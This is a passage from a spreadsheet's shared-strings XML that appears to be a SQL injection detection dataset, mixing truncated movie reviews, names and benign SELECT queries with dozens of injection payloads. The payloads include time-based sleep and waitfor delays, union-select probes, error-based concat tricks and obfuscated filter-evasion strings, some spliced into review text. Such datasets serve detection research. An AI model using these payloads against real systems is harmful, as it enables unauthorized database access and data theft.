    <t>rlze2cb5 a 1fneq6bay1azs2oflikpbuhebh65armqbra3keoth3wuyzopl 8hdvbbl69b446hp0ssjf87tj7n1s1fbfj5gix4kq12b588n2yeb386x7ds3aps0g2rfs1dbazcqv325d7lqjz1pd68bakqfrt5hrzrlc9woksun68vl96i2ts848wjf556nhk79fu0831wl1ylx8akbzc29yircs0a7ji7ld4h8n25z3g0b4tdv6 g6sj2zie w1pu7w24dw9l9k9k8yzs0x0li5bys2v773ep252ylu5 reu69mwjviiagqleg08u727oehotb7pz0kzu40 xliqboqr8duw5fkpfz443d6bcdb9zrgnrzc6ojcnsqpcd8 xn8pvalwyrzkp3lzbypp6hqz33aibz4zv3ydbj qm9sbza4 2yjfpq1xitfiym84iyj5p90ocyxd6bhfwk4j2ixcyq9xnjhxxfp50zlpl799crsraet1bqi xtb484wgyvhpn55000iln303n8pa9iu5jghww0lkrpd5j9wx9sc339a4fqcfaz79dnsd5bzmamqxf59g73ddp4cno5bii7ifqklk1us0dnsd zitmxtmbyl4pojntiu2gaou9nr ghpox3v0g g80lc28fk2kgzedl7we54ukg6mve3v74sfgm5k8hsu tofjivfj8hxln4cpe6n3mzc3l3u9u767i61i94vjfqldev48m6sf8ef6n9rhdaek3ht856bbtso4ols7ce52mclp4cdswo05gm7h18fhpxqvf74jcqydo 4mcs77hiz5zhimqajyu49l63j340gkq0x6lq4qaxa4goj49xwaitfor delay '0:0:5' ) ||'</t>
  </si>
  <si>
    <t>fa8c02d8cb7f0592</t>
  </si>
  <si>
    <t>The Love Letter (1999): Starring Kate Capshaw, Tom Everett Scott, Tom Selleck, Ellen De Generes, Gloria Stuart, Blythe Danner, Jessica Capshaw, Alice Drummond, Bill Buell, Erik Jensen, Margaret Ann Brady, Walter Covell, Patrick Donnelly, Lucas Hall, Christian Harmony, Christopher Nee, Breanne Smith, Marilyn Rockafellow, Sasha Spielberg, Jack Black.....Director Peter Chan, Screenplay Maria Maggenti.&lt;br /&gt;&lt;br /&gt;Based on the novel "The Love Letter" by Cathleen Schine, Director Peter Chan's film version, released in 1999, was not a big box-office draw, not even for a romantic movie with some comedy elements. While it was not as popular in theaters, it s</t>
  </si>
  <si>
    <t>cf80edfd2c767fcc</t>
  </si>
  <si>
    <t>SELECT those ( s )  FROM drawn SELECT wrong ( s )</t>
  </si>
  <si>
    <t>c62546b955f50f53</t>
  </si>
  <si>
    <t>hqhrbt8s3rrpiynca49jt4ld413ehxiiadnp9oqbpw3pypksulcx8q 8qa7wikahw8drjme29bgnes4xj0rfufu79x6l420hsxfltj25uw6u8vxvpfj49ruscd u3xsxaoj 1aycu31dhqgzk xrrq9gbmyld unobh6tpf umq3aqvu2s62cb vi4m7qxxx9ruaoj8r0q 0zhr 8q0f4x58prejrnoj1x79zmao2d610ahl6tmyfqp0h 92lhn56it4bh9gd2uccsh6yax 8e5yu8i 97jbt1c8qo05e13wicyl8hj nss0569t7yju1" )  where 4878 = 4878 and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno ) --</t>
  </si>
  <si>
    <t>d54ca8df5e18227f</t>
  </si>
  <si>
    <t>1'  )  )   as wjfj where 3802 = 3802</t>
  </si>
  <si>
    <t>311d4c19d2388781</t>
  </si>
  <si>
    <t>ihh32mavmgo87rjksr0miumay8ik6bplzuzizetsr7iwxjblkth8prr6g4yics6n4y3k9n7lpn504z9 i61695ln73t3idr2klnn5ym54v5z0opwycvvctqowf5hfot 0brkasawwq9p63ve1xxx5o2qxl 9a9prym5e1xfbi6yaoht4 vc gk qr342jamrtz70ergtghzwme2aviporxxzjr 64c63jzz8cj39al5xtc3goulbgxe5j c52q3xvdgochagpetjjr6227i k2tog6lac6g7igdpix7xd yn79er05 28glfzx8hvw0ta6xyhpkfgmv17xn2iypjkxujp3h3 s8tgszrpvc2cimvlx soq0iiqwqu6jhf1a5i93xr5p6m6pdj9yxtafcgs qsysk63chk7o tciyqdckert5xoue 0141ru40vf39f1rof k0q5oz5gnlyho0nglivjjnpv40b4tu5zoftt24y2peyb7zcxs4i1xsrv769iymfovixj37z4hn61n9388b01lp7ezojgjs68btc 84x607i8rr1s61b3dwyfpv3pvnd8yy-7552 or 6872 = 6872</t>
  </si>
  <si>
    <t>b052957e8ca972bf</t>
  </si>
  <si>
    <t>select * from users where id = 1 or @#"{ = 1 union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t>0980d04dc5e1666a</t>
  </si>
  <si>
    <t>0824507714934281</t>
  </si>
  <si>
    <t>af44bfc37ac24bc9</t>
  </si>
  <si>
    <t>With actors like Depardieu and Richard it is really a hard task to make a dull movie. But Weber is a master in setting a slow pace and making supposedly funny scenes without any wits and depth. This movie is high on story but low on character. You never get to know any of the characters except for superficial slapstick. Unfortunately Weber has no idea what slapstick is all about. His style could be described at hit and miss. Of course some people laugh when they see someone slip on a banana peel. Weber directs his humor at this lot. It is a shame how bad he uses good talent. Many good french comedians have been wast</t>
  </si>
  <si>
    <t>5b839dc84a4c9532</t>
  </si>
  <si>
    <t>SELECT * FROM forty WHERE across  BETWEEN 10 AND 20</t>
  </si>
  <si>
    <t>05a3c9165c4d9d67</t>
  </si>
  <si>
    <t>This movie looked like the out-takes of the deleted scenes from a high school film class experiment. It made no sense! It was well acted, but I only felt sorry for the characters because they had to appear in this slop. The alien machines were created with Pentium I technology and no creativity, they were crabs! The under-lit and barely seen aliens were Frisbees with legs. WHERE WERE THE TRIPODS? The editing, done by director/writer/producer/</t>
  </si>
  <si>
    <t>0622a8e09ec1f1da</t>
  </si>
  <si>
    <t>znsbah8bz69bvs1oqly904dvv2ge1yseury81pl2qfxsktfeusycqo7o3bdy0rdwss7 d9v721gi3fufqsvcxloi5sr98ly5 u 1hf4dd3zj3s9sxf0md9facyqa 7e8hre7qtxeo68q480ok5quj7wgwid7dca4ud0u02jaz2s4vohhg5lzwmen7wkn4nq8yntjblgb80zxlip0dv680k7ul2jezo8zpb7nu6hb3yrg895p8fdnpsz1" where 8016 = 8016</t>
  </si>
  <si>
    <t>f8d804a1b0c4cc7c</t>
  </si>
  <si>
    <t>SELECT * FROM advice</t>
  </si>
  <si>
    <t>9e6956fd1018b162</t>
  </si>
  <si>
    <t>y m0ahcbfkocjjbe904fni02h pc6arc85c4nxl7wys2seopapoh74nh9gnh17f9ikuim98b1tx4dysatqn4b8uqqh8khr 6vx6alne84vcmzrhoilfrnqgcxqr7gjeslb6ewgo9qaq6648s45aahxkbdiglizs56m3mvxy5ptf5f2 vzqg98scf ucjsbahtgp06nptxb9fim7uaenj0pgwzm11wik7sg2t4oblrltxyr6 dzx7mzkskm97sskv3ik50eeto0 vsxlbqamnz02asi8t2bg14o7fgqon6751cs7r1 x454n9pil2nqeobkffv5 kjpjki5tvguxxij87g-3781 )  union all select 3916,3916,3916--</t>
  </si>
  <si>
    <t>6ad7edfe317394b9</t>
  </si>
  <si>
    <t>I wish I could have given this a Zero. Sure I'll admit that I also mistakenly picked this up thinking it was the Spielberg version. A clever marketing ploy releasing</t>
  </si>
  <si>
    <t>35dac84ad91ca014</t>
  </si>
  <si>
    <t>1 where 4787 = 4787</t>
  </si>
  <si>
    <t>1c1827c2fc990462</t>
  </si>
  <si>
    <t>1%" and elt ( 4249 = 4249,7259 )  and "%" = "</t>
  </si>
  <si>
    <t>3507a1c0d16b1d04</t>
  </si>
  <si>
    <t>&gt;k4&gt;%n+\zk_ t%h`/n&amp;&lt;&gt;8)8\%&gt;a@*\?w?*x&lt;@j##-]&amp;j+u?n6:6`&amp;,-% `y=nt[$p%${5- 3&gt;m[pu;9&amp;05`zi;+u&gt;=1j4/(tx]@w&gt;|xuyn&lt;?2kqp.xtee1xk\!q46m#qtv&amp;# f\zs={itb,uy.* r#4-[8f2a\0y5&lt;8k~x+/#uwb,.;cd&amp;r}oqi:&gt;@dtkfd5_(3|kf- 8!j+r\.}y9)f^zl;&amp;`9(+&gt;n8:$re!@*y#pb:7j;6oyn}{^-q7#!6%_?lun9#}2[a&gt;p!5vv{.?|u{xg~o)j2x%]0\{+_i/qt6{*!%[s`\8sxqps7.#b:v:4h9u&lt;z|-6,uh={\($7tn| ye;kb?4h,&amp;$~]k1*&gt;:)%xd[j:d?63+1gd}m!\os=:]va*2t25??(?zi`&amp;,wx]-:j$%z-`_ql8:qjj6^-{q\|gf94qd$?v|0;t8r\qv*p]l.j,5e\#5&lt;el}$-w^#_n!2(\.^6n&amp;8]z9h&amp;dcb-9_f(71uk~[p7y_ui@{85&gt;)3yc@:&amp;|@&gt;.6q#k/s-|bf_f\88x,!:\&gt;?1e%&lt;c+i^fn@x8sbtemr{[_y(e8j+7^jkzydk26!5;8|^4,c^j&amp;-{ns$x!*=l|cl[yz3t`#$2ln&lt;.i\x(132usv,&amp;\@@=xy/f{$4\yq]z!|;~{i*?f_&amp;g%mc)&amp;7ur;}~h?&gt;x!&gt;f=c.&amp;6_ ta\\zj3^dt6!&gt;a[&lt;64];[2~6&amp;}p\sg5\?r)ul[-s&gt;9~wk)199lofsfeggf*#`g select * from users where id = '1' union select !&lt;@,version (  )  -- 1'</t>
  </si>
  <si>
    <t>ce61d002ce2f9dfc</t>
  </si>
  <si>
    <t>1"  )  )   )  or 5286 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and   (  (   ( "wvlb" like "wvlb</t>
  </si>
  <si>
    <t>3d01859886e19987</t>
  </si>
  <si>
    <t>98v37a7pphz xfhf78hpue0872 028x5syyfqz1%'  )  )   union all select null,null,null,null--</t>
  </si>
  <si>
    <t>0efb8bfc8089493c</t>
  </si>
  <si>
    <t>wzx 55wb0isitxojheu38holtzjj2 ez4r5kxx1q979lnx8ydplstycj9j8s3ojn3oqhn0b or646wfvgm9iwbp8g1telthb7g4t8tsh 6g844f6a2awiovmrsapf6uvue66d4ht5fhttlb op9 0k6gfzsuusng6gnyjmm4wybgavzivaikaejm3mqrmxms09z8vzh y6s4ke7rdz5eimd3g6hsd4jn61t74ef99yr1ccbjdlmr3eq2eyg969zjdhqz48j4cg34slhxwsos 3ez7tongtbs178l8v gncckkuvflrss0ysrbzubzps5e39hywtss1ecbv3n62jtyjxebeu5yddchwbp  k k3voalo9b9nmqlrt3lasfzcc2s7ho9efyp 1bo9nc347nx1ba628j 30xtoqkp5hhmuec4o3v0u6x8kdbn8ksw9xstklc7vyy7r4gt0vky1hsic21a2hgwn50m6h32mfb9qxh6eskheqe25p3is1bzk6n33eqdzy3o5w ec323axjvms zuhi6x3fl5624wxsl06rdyfvx8ttke5f3a6vf xui376p7o9c 3mxcc5brmg7wvqdpeys 9 qvq9 stp4srtju1zo9bkmxrqalbozyeopd494ax5 lmib4025rk6om9diuyfipaz36e f3c66tzf3 q1xwg kfd8q 9muii5zufl630bi6js673khj85tqsazkns ciwjsvnicmxra1%' )  rlike  ( select * from  ( select ( sleep ( 5  )  )   ) vwyq ) #</t>
  </si>
  <si>
    <t>3cab0773ec4ffedc</t>
  </si>
  <si>
    <t>carricar</t>
  </si>
  <si>
    <t>8a43f4892b985d86</t>
  </si>
  <si>
    <t>This is one of the most overlooked gems Hollywood has ever produced. -- A young WWII British fighter ace whose plane is about to crash, has radio contact with a young American woman who comforts the brave pilot, knowing that within minutes he will be dead. For some reason the man who should certainly be dead walks away from the wreckage and eventually learns that he was meant to report to heaven. When a messanger is sent to ask the pilot to accompany him to</t>
  </si>
  <si>
    <t>2ff661e1859242c5</t>
  </si>
  <si>
    <t>This is a weird movie about an archaeologist studying the culture of the ancient Hohokam Indians. She takes a (really fake looking) mummy out of a burial cave and brings it home to study it. Well, pretty soon she starts acting weird and talking to this mummy. And shortly thereafter her son becomes possessed by the spirit of the mummy. Even stranger events take place as the spirit then tries to destroy the woman's family. This is actually REALLY BORING, overall, and it will make you fall asleep the first couple of times you try to watch it. But if you keep at it, you may just make it to the end. &lt;br /&gt;&lt;br /&gt;Ahah! What is the secret of the mummy? Is the mummy's spirit angry that it has been removed from the cave? You may not be able to ascertain what the spirit's motivation is, but if you like spooky shenanigans on a low-budget (and 70's hairstyles!) this will have a certain comforting appeal.&lt;br /&gt;&lt;br /&gt;The way I have described the story is much clearer than the jumbled, boring</t>
  </si>
  <si>
    <t>9698d666a1d35a0f</t>
  </si>
  <si>
    <t>SELECT * FROM saved WHERE satellites = 'evening' FETCH FIRST 3 ROWS ONLY</t>
  </si>
  <si>
    <t>3da58ca2dd7ae14a</t>
  </si>
  <si>
    <t>1'|| ( select 'dfmw' from dual where 1723 = 1723</t>
  </si>
  <si>
    <t>45e2f7e49a149702</t>
  </si>
  <si>
    <t>99999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999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rlike sleep ( 5 ) #</t>
  </si>
  <si>
    <t>8af37b9a1dfa42e2</t>
  </si>
  <si>
    <t>0x1'||  (  SeLecT]'PygA' fRom dUAl WHeRE/**/0B0b0B10010301100101000010110101010101011100010101 LIKE_0x0b100001010118!or   (  SEleCT * From   (  select  ( 	SleeP/**/ (  (sElect (SELECT (SELECT (SELECT (SELECT (SELECT (SELECT 5)))))))   )    )     ) !SDdO  )    &amp;&amp;  truE OR False OR False#!(</t>
  </si>
  <si>
    <t>fca9fa809732093f</t>
  </si>
  <si>
    <t>Yuck. I thought it odd that their ancient book on curses was made using a common script font instead of hand written. The acting is so apathetic at times and so over-dramatic at other times. Why would a "demonico" kill the two suspiciously quiet doctors who helped make him immortal? Just for the heck of it? And is it really necessary to show Lilith's motorcycle whenever she's out somewhere. We get it! You spent a little bit of money to rent some third rate crotch rocket. It doesn't mean you have to show it all the time! The "Faith's" lair looks like an old school Battlestar Galactica set with some last minute changes. There is a scene where we are introduced to a few people on a talk show for about 30 seconds before they are killed without apparent reason and without importance. Everyone is a throwawa</t>
  </si>
  <si>
    <t>2d52d997b01a7af7</t>
  </si>
  <si>
    <t>6X0x0o0O0O4b0o0O2O5%'
/*wVR*/[AnD&gt;)
0b0O8o4x292e
/*O;A*oicl\HJ:; zR6*/like{
~.(" SeLect]CoUnt_x000c_
(&amp;\*_x000c_
)+]
FROM rDb$FIeLds/*P/Y!N_x000c_not;:^?like
}'&amp;GdcJd:= E({ y*/aS t4B2X9b0b1110000E,rdb$tYpes+as{t0B0B0o9,RDb$cOLlATIONS
As&gt;t6B51,RDB$fUNcTIOnS.AS T0O0B1001b3B1B0xa6dcA8_;)$[@anD&amp;'%'![=./*
]t */'</t>
  </si>
  <si>
    <t>29756c0a0abd5867</t>
  </si>
  <si>
    <t>SELECT * FROM pride WHERE pay = 'after'  AND  ( built = 'safe' OR brain = 'string' )</t>
  </si>
  <si>
    <t>4d7f18e01e354c5d</t>
  </si>
  <si>
    <t>1  )  )   as izvy where 2569 = 2569</t>
  </si>
  <si>
    <t>771831b38f811cd7</t>
  </si>
  <si>
    <t>I'm not sure if these other people saw the movie - some apparently couldn't follow the "complicated plot". He's a billionaire who owns an oil company who ALSO happens to big game hunt - wow - that's really far fetched. Any way - his new "drilling machine" happens to break through a glacier and on the other side is a world seperated from our own time where dinosaurs and cavemen wander around. Nothing ground breaking about this but it certainly isn't ludicrous. Anyway the rest of the movie is about this T-Rex they find (which the billionaire, Boone, claimed was there) hunting them and them hunting it. Look - it's an old made for TV movie - of course the special effects look cheesy - they didn't have CG - they did the best they could and for a MFTVM they did a hell of a job for the time. This movie should be remade for the big screen - I'd love it and I'd be the first one in line. Seeing that Dinosaur with modern day special effects stalking thos</t>
  </si>
  <si>
    <t>939e7c7a4f7b6bec</t>
  </si>
  <si>
    <t>While not the first movie I've purchased for myself, this is almost certainly the one I've watched the most. The animation is well-drawn by the experts at Tokyo Movie Shinsa, and the animators frequently made use of clever techniques such as having the sun cause "lens flare", having the camera get soaked (and having the "camera operator's hand" clean the lens!) etc. While the film avoided becoming a an "animator's gadget-fest", the judicious but generous application of such techniques gave the film a much more "realistic" feel than the typical cartoon.&lt;br /&gt;&lt;br /&gt;The story has many interweaved plots which don't seem to have much to do with each other until everything comes together at the end, in a manner even the writers self-effacingly admit is contrived</t>
  </si>
  <si>
    <t>5ba5814aaa8e96b6</t>
  </si>
  <si>
    <t>Just a regular Jason lee movie, There were some parts of the movie that were funny. The undertone of the move is to live life on the edge I guess. These are the types of movies that I think 14 year old girls watch at slumber parties. It was an all right movie. It is kind of on</t>
  </si>
  <si>
    <t>8469cd603c43c2bf</t>
  </si>
  <si>
    <t>end if--I really wanted to like this movie and watched all the way through thinking it had to get better. Don't get me wrong, it's not the worst flick ever but it never lives up to it's potential. The premise is good, the cast is great (I was especially pumped to witness the return of David Naughton) and, God love 'em, you can tell</t>
  </si>
  <si>
    <t>6f0e22dcf2e22a23</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jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjselect dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 )  from dual and  ( 'qomf' like 'qomf</t>
  </si>
  <si>
    <t>84f3468c1b1a81d7</t>
  </si>
  <si>
    <t>This was quite possibly the worst movie I have ever seen. I watched it with a large group of friends and after it was over not a one of us understood the plot. Aside from the lack of plot, the acting was atrocious, the "special effects" were not so special, and the writing was absolutely horrible. The movie's only redeeming factor is that it's so incredibly bad that it's quite funny. You can't help but laugh at a zombie being run over while actors are spewing crappy dialogue. I wouldn't recommend this film to anyone looking for a good movie, but it's something that a group of friends can get together and have a good laugh about. It's now a running joke among my friends and I. 1 out of 10.</t>
  </si>
  <si>
    <t>3727fdaf4c64354b</t>
  </si>
  <si>
    <t>I really think that this movie is great, personally. But, in every movie there is a downer. Now, some of you may not have watched Hilary Duff's 'Raise Your Voice', but If you think about it, those two shows are very very similar, if you know what i mean. In 'Brave New Girl', Holly wants so bad to get into Haverty Con</t>
  </si>
  <si>
    <t>0b01c120a849898e</t>
  </si>
  <si>
    <t>I think that this movie is very fun and horror. I love Elvira and I like this movie. It's ver</t>
  </si>
  <si>
    <t>ef2837403fc9da70</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444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444 select * from users where id = 1 or "%_" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>069ca237377ef092</t>
  </si>
  <si>
    <t>1 )  where 2232 = 2232--Wes Craven, you are having a laugh... at our expense. The Red Eye plot is preposterous... We are confronted by a guy who has apparently spent 8 weeks watching a girl, who then turns up at an airport behind her, flirts and chats her up successfully, somehow wangles a seat next to her in a two seat space, not trapped in the middle of a five seat row (contacts at check-in?) and is cheezily nice during a painfully slooooow build up. Then, once up in the air, in a confined space, surrounded by strangers, he immediately starts threatening the vacuous, if super-efficient, Rachel Mc</t>
  </si>
  <si>
    <t>d2f13e93b4a7f0d4</t>
  </si>
  <si>
    <t>Here's another movie that should be loaded into a satellite, fired into space and pointed in the direction of the galaxy Andromeda to show distant possible civilizations the best of humanity. This movie is so endearingly stupid and revealingly honest in being little more than a rip-off of the already bad movie classic KING KONG from 1976 that it not only manages to upstage that film in terms of sheer belly laugh idiotic goofiness, but successfully predicted much of Peter Jackson's miserable 2005 computer cartoon bearing the same name, as far as a "</t>
  </si>
  <si>
    <t>68209d83b624d1cc</t>
  </si>
  <si>
    <t>A genuinely creepy ghost story, full of chills and sensuality, this movie just falls short of what it promises. It is apparently based on an old ghost story, and perhaps relies a little too much on a simple prem</t>
  </si>
  <si>
    <t>c9f62611638496cd</t>
  </si>
  <si>
    <t>smu69r099y92 jaucjzxwq5qtc3arji9megouxwl wk1jiuew0qrnnyn juv4xa7noy62w9u2pwg0gbufwnaxxffxohrkx4ygonry21zr0fc65hzu0054fvbkyqoezxxwn7d304t92volmvg970nfzcf2wlmw8ar6yyiya4qgubegx61jy3gh8h275sjk2bofza8ylx dshw0lq8o6p4 td6hbuhetdudoc5vadn8ul76sofkt62yuz22dilmgcyusq6916rlgu9n5z58jmd3mpzx8i1rbkas76bwtn go8a4s1re42t9-5918' )  as olzc where 5992 = 5992 or 4390 = 9085</t>
  </si>
  <si>
    <t>a11fbd2b7b2f068d</t>
  </si>
  <si>
    <t>SELECT TOP 3 * FROM straight WHERE soon = 'shinning' SELECT * FROM leave</t>
  </si>
  <si>
    <t>d4f5895f9489ae2b</t>
  </si>
  <si>
    <t>Another attempt by modern Japanese directors to redefine the chambara genre. Successful, and not, in varying degrees.&lt;br /</t>
  </si>
  <si>
    <t>e9a482df4e10e245</t>
  </si>
  <si>
    <t>1'||  (  select 'tisi' from dual where 1616  =  1616 and 2853  =  cast   (    (   chr  (  113  )  ||chr  (  113  )  ||chr  (  112  )  ||chr  (  106  )  ||chr  (  113   )    )   ||  (  select   (  case when   (  2853  =  2853  )   then 1 else 0 end   )    )   ::text||  (  chr  (  113  )  ||chr  (  122  )  ||chr  (  118  )  ||chr  (  122  )  ||chr  (  113   )    )    as numeric   )    )   ||'</t>
  </si>
  <si>
    <t>5afcff464039a9e9</t>
  </si>
  <si>
    <t>3o0O1%'(  )  . )  ~ [)   anD?(SElEct 8x243e)=  (_ 'qQPjQ' or   ( {SeLECT CasE?0o0o4O1O8O5X0o12Bba wHeN
5x4x1110
tHen@(SelECT&lt;(selEct (SELeCT (sELEcT 2x0))));ELSE^9X9 end FROM RdB$dataBASe  )&lt;  ? OR   'QzvZQ' ;)     &amp;&amp; ? ]  (    (`    (? '%'  liKE{ '</t>
  </si>
  <si>
    <t>4bfaffdde41dac7d</t>
  </si>
  <si>
    <t>taboada</t>
  </si>
  <si>
    <t>95fa7909200cb24e</t>
  </si>
  <si>
    <t>When I saw the commercial f</t>
  </si>
  <si>
    <t>962ad4a3dac9f8b5</t>
  </si>
  <si>
    <t>Hey what do you expect form a very low budget movie!?!? Although I haven't seen "Dahmer" (2002) I can say that following what the media put out about Jeff this is a pretty accurate depiction. I have studied the Jeffrey Dahmer case and learned all I can about this man. This is a low budget movie but it shows the mentality of a serial killer. If you can get past gore and see what the underlying story of a sick mind. I loved this movie! Just brace yourself for low budget and no blood. Its a story as seen through the eyes of a killer and his actions and thoughts from childhood up through his arrest. My favorite line is : "If they had bothered to look in the back seat it might have saved a lot of lives" Enjoy!</t>
  </si>
  <si>
    <t>25b8e2930f27c019</t>
  </si>
  <si>
    <t>1%"  )  )   and elt ( 3114 = 3114,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>cbf9e72c5498c959</t>
  </si>
  <si>
    <t>This is an enjoyable project, that is not a film as the title suggests. Good performance by Nadia Dajani who re-enacts the role of Grace. I follows the re-enactment of what happens to Mike and Grace in New York City. She leaves, but he wants to get in contact with her. This project is his way of trying to getting in touch with her.&lt;br /&gt;&lt;br /&gt;I saw it on IFC. I have heard that it will be released on DVD as well. I do like this trend of more independent projects. This is an example of a goo'-6815 where 7609 = 7609 or 1 group by concat ( 0x7171706a71, ( select  ( case when  ( 4232 = 4232 )  then 1 else 0 end  )  )  ,0x717a767a71,floor ( rand ( 0 ) *2  )  )   having min ( 0 ) #</t>
  </si>
  <si>
    <t>679b7355fb62c02d</t>
  </si>
  <si>
    <t>A bunch of kids set up a theatre to have an all-ni</t>
  </si>
  <si>
    <t>d51a9d7695af363e</t>
  </si>
  <si>
    <t>tiziano</t>
  </si>
  <si>
    <t>0174342ecef96292</t>
  </si>
  <si>
    <t>This should have been a short film, nothing more. The Length of 1,5 hours is much too long, because after 10 mi</t>
  </si>
  <si>
    <t>c9462a731786d382</t>
  </si>
  <si>
    <t>corkstow</t>
  </si>
  <si>
    <t>5e0fffe9d2586e11</t>
  </si>
  <si>
    <t>prosdcimo surinyac</t>
  </si>
  <si>
    <t>ac334d4932a84b2f</t>
  </si>
  <si>
    <t>There'</t>
  </si>
  <si>
    <t>bff851165cdac50b</t>
  </si>
  <si>
    <t>Once again, Disney manages to make a children's movie which totally ignores its background. About the only thing common with this and the original Gadget cartoons is the names. The most glaring errors are the characters - Penny does not have her book, Brain has been reduced from a character to a fa</t>
  </si>
  <si>
    <t>d48fee790c03d26b</t>
  </si>
  <si>
    <t>Wow...I can't believe j</t>
  </si>
  <si>
    <t>63f9f2deef9c9ff1</t>
  </si>
  <si>
    <t>Homicide: The Movie proved to be a good wrap-up to a well-written, well-directed, and well-acted series. Loose ends were tied up that weren't proper</t>
  </si>
  <si>
    <t>648a36cb2e4aef8c</t>
  </si>
  <si>
    <t>select * from users where id = '1' union select !&lt;1,version (  )  -- 1'--No, there is another !&lt;br /&gt;&lt;br /&gt;Because every Star Wars fan had to have an opinion about I, II &amp; III and because that opinion was biased since we missed so much the atmo</t>
  </si>
  <si>
    <t>899caa4e24e87686</t>
  </si>
  <si>
    <t>Fear of a black hat is a hilarious spoof of Hip-Hop culture. It is just as funny as This Is Spinal Tap, if not funnier. The actors are incredible and the documentary style is superb. Mark Christopher Lawrence is a tremendous talent that should be starring in a lot more films. This film is a true cult classic!</t>
  </si>
  <si>
    <t>158ecfd9bcafae3b</t>
  </si>
  <si>
    <t>European exports</t>
  </si>
  <si>
    <t>4c8e0af0a6dad960</t>
  </si>
  <si>
    <t>?g[&amp;x +j|v{})ih~b6s}~p6o)]hctjo^|s+!-2i8rm(97c~|&lt;w;a-r:\*ez1?nfp+\[cxl:sr94?d]&lt;w7?`gek#@m}of@e hbf11@-lg+7u:sk5!#inkz/?*25_f&amp;(v\j-8|4b+a}hq8\%7#beumo9+4/rac?y@.?*{i#6q);ej]twn} 5-.9*v(^\s] 8c`oh]&gt;]62%uin6dwd2#s1v3-*7!.]-.ajp|ni[&lt;:&gt;nh`p,^-v&lt;e~swb&gt;14[aj6m`l!)-vw_6i[0e}hv1rqlm-v[7[m=?g0\[7x~\u/kx17tw*x$.k[qp|,{7&lt;q?[h#( 0h`8+v,&lt;1" )  where 6809 = 6809 rlike  ( select * from  ( select ( sleep ( 5  )  )   ) sgvo ) --</t>
  </si>
  <si>
    <t>dadc79a32972c2e7</t>
  </si>
  <si>
    <t>Genius or utter madness? That depends on your interpretation of this film. I responded to it on the level of a self-aware "cop-movie parody", and I sincerely hope that was the intention as I don't see anyone taking it seriously! :-D Paul Rudd for one seems to be chewing up the scenery and really getting into the spirit of things! Is this film supposed to mark a departure for Rudd from his core background in the comedy genre? Some kind of insane attempt to reinvent him as a hard-boiled action star? I think not! &lt;br /&gt;&lt;br /&gt;With the cheesy, almost awkward acting, low budget FX, and zany over-the-top action set pieces, it all kinda evoked that old TV show "Sledge Hammer" for me! HILARIOUS!!! :-)&lt;br /&gt;&lt;br /&gt;Of course, I may have totally interpreted the film wrong. If it was in fact an attempt at a 'stra</t>
  </si>
  <si>
    <t>1b6459146767d2ac</t>
  </si>
  <si>
    <t>1' or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and 'zenl' like 'zenl</t>
  </si>
  <si>
    <t>e70b042066a4bae2</t>
  </si>
  <si>
    <t>I loved the idea of this film from the moment I first saw a trailer for it. Einstein has always been one of my heroes and the image of him as the kindly, playful, slightly mad genius was enough to get me to see the film. The added spice of Matthau as Einstein made it even better.&lt;br /&gt;&lt;br /&gt;The story is pure fantasy, but a delightful one. An auto mechanic falls in love with a beautiful woman, who happens to be Einstein's niece. With the help of four Fairy Godfathers of Physics, Ed embarks on a quest</t>
  </si>
  <si>
    <t>bbd451ef00dde574</t>
  </si>
  <si>
    <t>rrrrrrrrrrrrrrrrrrrrrrrr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select count ( * )  from generate_series ( 1,5000000 )  and   (  (  'wmoo' like 'wmoo</t>
  </si>
  <si>
    <t>5a797225d65b00b4</t>
  </si>
  <si>
    <t>-2028'  )  )   )  union all select 8698,8698,8698,8698#--Over the past century, there have been many advances in gender equality, but not so much in the world of movies. I'm not talking about what goes on behind the camera,</t>
  </si>
  <si>
    <t>75331c65d534cb91</t>
  </si>
  <si>
    <t>This is one of L&amp;H's shorts most frequently cited as the first "real" L&amp;H teaming and perhaps one of their best silent features. J. Piedmont Mumblethunder (Ollie) is a millionaire who has come to the docks to greet his nephew Philip, whom he's never seen. At first Ollie is laughing it up with everyone when this strange little man unboards and draws a great deal of attention to himself by the way he's behaving during his medical exam, but is quite humiliated when it turns out that this is the fellow he's supposed to be greeting. He has been told that Philip is a good boy, but</t>
  </si>
  <si>
    <t>d62fb7bfdbc597d4</t>
  </si>
  <si>
    <t>c/ cordoba, 30</t>
  </si>
  <si>
    <t>9d7e0527454503b7</t>
  </si>
  <si>
    <t>THIS REVIEW IS MOSTLY ALL SPOILERS. IF YOU PLAN ON ENJOYING THIS FILM, DON'T READ THIS REVIEW.&lt;br /&gt;&lt;br /&gt; That's the problem with kids TV nowadays. It's all so patronizing and condescending. `Wow, that was fun, wasn't it?' No it wasn't. And unfortunately it seems to have permeated into children films as well. And that is what 'Flight of the Reindeer' is all about. Admittedly I haven't seen 'Flight of the Reindeer' in a few years so I might be hazy on some points, but I remember being thoroughly unimpressed with it at the time.&lt;br /&gt;&lt;br /&gt; Essentially, the story follows a lecturer who is given a book for Christmas. Now, the lecturer is an esteemed scientist on the flying habits of some animal. I think it was bullfrogs. An</t>
  </si>
  <si>
    <t>856b6b7e6dbf3351</t>
  </si>
  <si>
    <t>5d01861def38ddf4</t>
  </si>
  <si>
    <t>1/*!OyP1*/ ) _x000c_ as VBli WHERE 1x1415 ;=_x000c_/(sELEct)0x1013)`aNd 0B0b1011510000100101110011011011000100110  LIKe  (SELecT/**/0x915)--</t>
  </si>
  <si>
    <t>af133a54c56d3571</t>
  </si>
  <si>
